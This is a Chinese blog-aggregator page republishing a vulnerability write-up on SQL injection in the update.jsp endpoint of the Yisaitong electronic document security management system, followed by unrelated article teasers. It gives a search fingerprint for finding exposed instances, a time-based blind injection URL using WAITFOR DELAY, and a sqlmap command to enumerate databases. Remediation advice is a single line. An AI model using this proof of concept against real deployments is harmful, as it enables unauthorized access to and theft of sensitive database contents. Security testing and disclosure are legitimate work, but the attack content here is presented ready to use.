当前位置: 首页 > news >正文

亿赛通电子文档安全管理系统 Update.jsp SQL注入

news 2026/2/7 15:50:51

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现页面

0x05 漏洞修复建议

0x01 漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
 

0x02 影响产品

  1. 亿赛通电子文档安全管理系统

0x03 语法特征

  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面
 

图片


POC

 

  1.  
    CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--
     
 

修改值的大小 对应延迟时间
  
 

图片
 

 

图片
 

 

  1.  
    python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv
     
  2.  
    ate/update.jsp?flag=1&ids=1,3)" --batch --dbs
     
 

 

图片
 

 

0x05 漏洞修复建议
 

设置防火墙规则,过滤漏洞相关的敏感链接监测
 

 

图片
 

                                                   没看够~?欢迎关注扫一扫~
 

 

 

 















相关文章:
















亿赛通电子文档安全管理系统 Update.jsp SQL注入




目录 
0x01 漏洞介绍 
0x02 影响产品 
0x03 语法特征 
0x04 漏洞复现页面 
0x05 漏洞修复建议 0x01 漏洞介绍 
亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台&#…...






编程日记
2023/10/20 6:15:51



















神经网络中的反向传播:综合指南




塔曼纳 一、说明 反向传播是人工神经网络 (ANN) 中用于训练深度学习模型的流行算法。它是一种监督学习技术,用于调整网络中神经元的权重,以最小化预测输出和实际输出之间的误差。 在神经网络中,反向传播是计算损失函数…...






编程日记
2023/10/20 6:14:51



















协同创新、奔赴未来——“华为云杯”2023人工智能创新应用大赛华丽谢幕




9月27日,在苏州工业园区管理委员会、华为云计算技术有限公司的指导下,由SISPARK(苏州国际科技园)、华为(苏州)人工智能创新中心联合主办,东北大学工业智能与系统优化国家级前沿科学中心、浙江大…...






编程日记
2023/10/20 6:13:50



















介绍Node.js中fs模块 代码和注释。




Node.js中的fs模块提供了一些用于文件系统操作的API,包括文件读写、目录操作等。 
读取文件 
使用fs.readFile()方法可以读取文件内容。该方法的第一个参数是文件路径,第二个参数是可选的选项对象,第三个参数是回调函数。回调函数的第一个参数…...






编程日记
2023/10/20 6:12:49



















【QT 读取JSON】 深入浅出 使用QT内置的QJson模块解析Json文件 匠心之作




目录 0 引言1 Json数据分析2 解析Json数据 🙋‍♂️ 作者:海码007📜 专栏:QT专栏💥 标题:【QT 读取JSON】 使用QT内置的QJson模块解析Json文件❣️ 寄语:人生的意义或许可以发挥自己全部的潜力&…...






编程日记
2023/10/20 6:11:48



















初识javaweb2 tomcat




如果是tomcat启动成功却无法通过localhost:8080进入页面,先去查看是否是端口号被占用, 再用命令中断占用的进程,如果简单的命令窗口无法中断,切换到管理员身份运行即可 netstat -ano|findstr "8080"  查看那个进程占用了…...






编程日记
2023/10/20 6:10:47



















使用OPENROWSET :在一个数据库中查询另一个数据库的数据




当你需要在一个数据库中查询另一个数据库的数据时,SQL Server提供了多种方法来实现这一目标。一种常见的方法是使用链接服务器(Linked Server),另一种方法是使用 OPENROWSET 函数。本篇博客将重点介绍如何使用 OPENROWSET 函数在当…...






编程日记
2023/10/20 6:09:46



















基于STM32设计的智慧农业管理系统(ESP8266+腾讯云微信小程序)




一、项目介绍 基于STM32设计的智慧农业控制系统(ESP8266+腾讯云微信小程序) 1.1 项目背景 
随着人们对食品安全和生态环境的日益重视,智慧农业逐渐成为一个备受关注的领域。智能化管理可以提高农业生产效率,减少资源浪费,改善生态环境。因此,基于物联网技术的智慧农业管理系…...






编程日记
2023/10/20 6:08:44



















Flutter视图原理之三棵树的建立过程




目录 三棵树的关系树的构建过程1.updateChild函数(element的复用)2.inflateWidget函数3.mount函数3.1 componentElement的实现3.2 RenderObjectElement的实现3.2.1 attachRenderObject函数 4.performRebuild函数 总结三棵树创建流程 三棵树的关系 
Flutt…...






编程日记
2023/10/20 6:07:43



















详细解析冒泡排序,JS如何基本实现的。




目录 冒泡排序是什么: 
使用冒泡排序是为了什么: 
DEMO示例: 冒泡排序是什么: 
冒泡排序(Bubble Sort)是一种简单的比较排序算法,它通过多次遍历待排序的元素,比较相邻元素的大小,如果它们的顺序不正确就交换它们&…...






编程日记
2023/10/20 6:06:43



















如何消除CSDN博文代码中自动添加的行号




哪里有自定义目录标题 编写CSDN博文,使用代码块的linux命令行,预览时没有代码行号,但发布文章后自动添加了行号。 
git clone https://github.com/mikel-brostrom/yolo_tracking.git
cd yolo_tracking
pip install -v -e .为什么预览和发布的…...






编程日记
2023/10/20 6:05:42



















定制效果在线定制印刷系统源码 DIY在线定制系统源码 云印刷定制系统源码手机、PC端实时互通




支持各类产品的在线定制,无论是水杯雨伞U盘还是T恤衬衫四件套,均可轻松进行定制 独创制作间概念,同一套模板可以重复对应不同制作间 手机、PC端实时互通,客户可通过任意途径进行图片上传、编辑,一方修改另一方即时可见…...






编程日记
2023/10/20 6:04:41



















算法|每日一题|同积元组|哈希统计




1726.同积元组 原题地址: 力扣每日一题:同积元组 给你一个由 不同 正整数组成的数组 nums ,请你返回满足 a * b  c * d 的元组 (a, b, c, d) 的数量。其中 a、b、c 和 d 都是 nums 中的元素,且 a ! b ! c ! d 。 
class Solution …...






编程日记
2023/10/20 6:03:39



















最新AI创作系统ChatGPT网站H5源码V2.6.4+搭建部署教程+支持GPT4.0+支持ai绘画(Midjourney)/支持Prompt预设应用




一、AI创作系统 
SparkAi创作系统是基于OpenAI很火的ChatGPT进行开发的Ai智能问答系统AI绘画系统,支持OpenAI GPT全模型国内AI全模型。本期针对源码系统整体测试下来非常完美,可以说SparkAi是目前国内一款的ChatGPT对接OpenAI软件系统。那么如何搭建部署…...






编程日记
2023/10/20 6:02:37



















最新!两步 永久禁止谷歌浏览器 Google Chrome 自动更新




先放效果图: CSDN这个问题最火的大哥的用了没用 像他这样连浏览器都打不开 
为什么要禁止chrome自动更新 
看到很多搞笑的大哥,说为啥要禁止; 
我觉得最大的原因就是chromedriver跟不上chrome的自动更新,导致我们做selenium爬虫的…...






编程日记
2023/10/20 6:01:37



















在Java中线程和进程的区别




在Java中,线程和进程的区别与一般的操作系统环境下类似,但在Java语言层面上也有一些特点。下面是在Java中线程和进程的区别: 定义:在Java中,进程是指一个正在运行的应用程序实例,而线程是进程中的执行单元。…...






编程日记
2023/10/20 6:00:35



















【高危安全通告】Oracle 10月月度安全漏洞预警




近日,安全狗应急响应中心关注到Oracle官方发布安全公告,共披露出在Oracle Weblogic中存在的6个高危漏洞。 漏洞描述 
CVE-2023-22069:Oracle Weblogic 远程代码执行漏洞 
Oracle WebLogic Server存在远程代码执行漏洞,该漏洞的CVS…...






编程日记
2023/10/20 5:59:34



















卷王问卷考试系统SurveyKing,开源调查问卷和考试系统源码




卷王问卷考试系统/SurveyKing是一个功能最强大的开源调查问卷和考试系统,可以快速部署,并适用于各行业。该系统提供了在线表单设计、数据收集、统计和分析等功能,支持20多种题型,多种创建问卷方式和多种问卷设置。 
无论您是需要进…...






编程日记
2023/10/20 5:58:33



















uniapp开发微信小程序,webview内嵌h5,h5打开pdf地址,解决方案




根据公司要求,让我写一个h5,后续会嵌入到合作公司的微信小程序的webview中,如果是自己公司微信小程序,可以采取先下载下来pdf,然后通过wx.openDocument,进行单纯的预览操作,这个可以根据这个老哥…...






编程日记
2023/10/20 5:57:33



















Swift使用Embassy库进行数据采集:热点新闻自动生成器




概述 
爬虫程序是一种可以自动从网页上抓取数据的软件。爬虫程序可以用于各种目的,例如搜索引擎、数据分析、内容聚合等。本文将介绍如何使用Swift语言和Embassy库编写一个简单的爬虫程序,该程序可以从新闻网站上采集热点信息,并生成一个简单…...






编程日记
2023/10/20 5:56:32





















C++初阶-list的底层




目录 1.std::list实现的所有代码 
2.list的简单介绍 
2.1实现list的类 
2.2_list_iterator的实现 
2.2.1_list_iterator实现的原因和好处 
2.2.2_list_iterator实现 
2.3_list_node的实现 
2.3.1. 避免递归的模板依赖 
2.3.2. 内存布局一致性 
2.3.3. 类型安全的替代方案 
2.3.…...






编程新知
2026/2/4 17:44:58



















【Oracle APEX开发小技巧12】




有如下需求: 
有一个问题反馈页面,要实现在apex页面展示能直观看到反馈时间超过7天未处理的数据,方便管理员及时处理反馈。 
我的方法:直接将逻辑写在SQL中,这样可以直接在页面展示 完整代码: 
SELECTSF.FE…...






编程新知
2026/1/31 12:19:33



















STM32F4基本定时器使用和原理详解




STM32F4基本定时器使用和原理详解 前言如何确定定时器挂载在哪条时钟线上配置及使用方法参数配置PrescalerCounter ModeCounter Periodauto-reload preloadTrigger Event Selection 中断配置生成的代码及使用方法初始化代码基本定时器触发DCA或者ADC的代码讲解中断代码定时启动…...






编程新知
2026/1/26 21:56:38



















Cinnamon修改面板小工具图标




Cinnamon开始菜单-CSDN博客 
设置模块都是做好的,比GNOME简单得多! 
在 applet.js 里增加 
const Settings  imports.ui.settings;this.settings  new Settings.AppletSettings(this, HTYMenusonichy, instance_id);
this.settings.bind(menu-icon, menu…...






编程新知
2026/1/31 14:56:22



















大模型多显卡多服务器并行计算方法与实践指南




一、分布式训练概述 
大规模语言模型的训练通常需要分布式计算技术,以解决单机资源不足的问题。分布式训练主要分为两种模式: 数据并行:将数据分片到不同设备,每个设备拥有完整的模型副本 模型并行:将模型分割到不同设备,每个设备处理部分模型计算 现代大模型训练通常结合…...






编程新知
2025/12/10 20:45:02



















Android 之 kotlin 语言学习笔记三(Kotlin-Java 互操作)




参考官方文档:https://developer.android.google.cn/kotlin/interop?hlzh-cn 
一、Java(供 Kotlin 使用) 
1、不得使用硬关键字 
不要使用 Kotlin 的任何硬关键字作为方法的名称 或字段。允许使用 Kotlin 的软关键字、修饰符关键字和特殊标识…...






编程新知
2026/2/5 4:34:41



















什么是Ansible Jinja2




理解 Ansible Jinja2 模板 
Ansible 是一款功能强大的开源自动化工具,可让您无缝地管理和配置系统。Ansible 的一大亮点是它使用 Jinja2 模板,允许您根据变量数据动态生成文件、配置设置和脚本。本文将向您介绍 Ansible 中的 Jinja2 模板,并通…...






编程新知
2026/2/6 1:00:25



















零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)




本期内容并不是很难,相信大家会学的很愉快,当然对于有后端基础的朋友来说,本期内容更加容易了解,当然没有基础的也别担心,本期内容会详细解释有关内容 本期用到的软件:yakit(因为经过之前好多期…...






编程新知
2026/1/21 12:29:04



















Golang——7、包与接口详解




包与接口详解 1、Golang包详解1.1、Golang中包的定义和介绍1.2、Golang包管理工具go mod1.3、Golang中自定义包1.4、Golang中使用第三包1.5、init函数 2、接口详解2.1、接口的定义2.2、空接口2.3、类型断言2.4、结构体值接收者和指针接收者实现接口的区别2.5、一个结构体实现多…...






编程新知
2026/2/2 16:55:46



















JS红宝书笔记 - 3.3 变量




要定义变量,可以使用var操作符,后跟变量名 
ES实现变量初始化,因此可以同时定义变量并设置它的值 
使用var操作符定义的变量会成为包含它的函数的局部变量。 
在函数内定义变量时省略var操作符,可以创建一个全局变量 
如果需要定义…...






编程新知
2025/11/29 5:47:26